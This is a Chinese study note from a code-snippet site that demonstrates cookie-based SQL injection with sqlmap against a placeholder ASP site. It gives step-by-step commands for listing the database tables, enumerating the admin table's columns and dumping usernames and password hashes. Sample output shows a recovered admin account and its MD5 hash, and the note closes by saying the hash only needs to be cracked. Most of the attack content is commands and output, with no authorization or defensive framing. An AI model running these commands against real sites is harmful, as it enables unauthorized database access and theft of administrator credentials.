3.sqlmap学习笔记之Cookie注入 - 程序员工具箱

2000万优秀解决方案库，覆盖所有编程及软件开发类，极速查询

今日已更新 140 篇代码解决方案

首页 > 代码库 > 3.sqlmap学习笔记之Cookie注入

3.sqlmap学习笔记之Cookie注入

2024-08-03 20:03:34 222人阅读

Cookie注入：

1.假设这个网址"http://www.xxx.org/Show.asp？id=9"存在注入点.
2.sqlmap命令提示符下输入下列内容进行跑表。

  sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --table --level 2

假设返回内容如下,说明是access数据库。

   -------------------------      [INFO] resuming back-end DBMS ‘microsoft access‘   -------------------------

设置线程数：10
假设返回结果：

-------------------------------------------[ 4 tables]+----------------------+       admin       mark       province       vote+----------------------+

找到四个表分别为：admin mark province vote

3.猜表的字段名：

  sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --columns -T admin --level 2

假设找到admin表的字段如下：
id username password

---------------------------------  [INFO] retrieved:       id  [INFO] retrieved:       username  [INFO] retrieved:       password----------------------------------

4.猜测字段的内容：

    sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --dump -T admin -C "username,password" --level 2

获取结果：

  [INFO] retrieved:       1  [INFO] retrieved:       admin  [INFO] retrieved:       21232f297a57a5a743894a0e4a801fc3  (32位MD5加密密文)

账号：admin 密码:将密文解密即可。

3.sqlmap学习笔记之Cookie注入

声明：以上内容来自用户投稿及互联网公开渠道收集整理发布，本网站不拥有所有权，未作人工编辑处理，也不承担相关法律责任，若内容有误或涉及侵权可进行投诉：投诉/举报工作人员会在5个工作日内联系你，一经查实，本站将立刻删除涉嫌侵权内容。

联系
我们